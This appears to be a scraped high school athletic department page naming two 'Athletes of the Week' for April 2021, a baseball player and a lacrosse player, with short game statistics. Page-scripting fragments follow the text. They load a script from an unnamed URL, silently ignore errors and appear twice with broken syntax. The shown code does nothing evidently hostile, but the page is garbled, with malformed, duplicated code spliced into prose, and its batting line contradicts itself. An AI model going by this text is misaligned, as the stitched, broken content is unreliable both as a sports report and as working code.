Athletic Dept.
Kemba Credit Union Athletes of the Week 4/19/2021-4/25/2021
Adrian Davis
Senior, Baseball
Adrain had a very productive week in both GMC wins over Colerain and Hamilton. Adrian contributed at the plate going 3 for 4 racking up 6 runs and an RBI. He also hit a double, triple, and a home run in both games.
Anna Wells
Sophomore, Lacrosse
Anna had a great game leading the Firebirds in a win over the Indians 15-2. Anna caused 3 turnovers while hustling for 7 loose balls leading to 1 assist and 6 goals.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();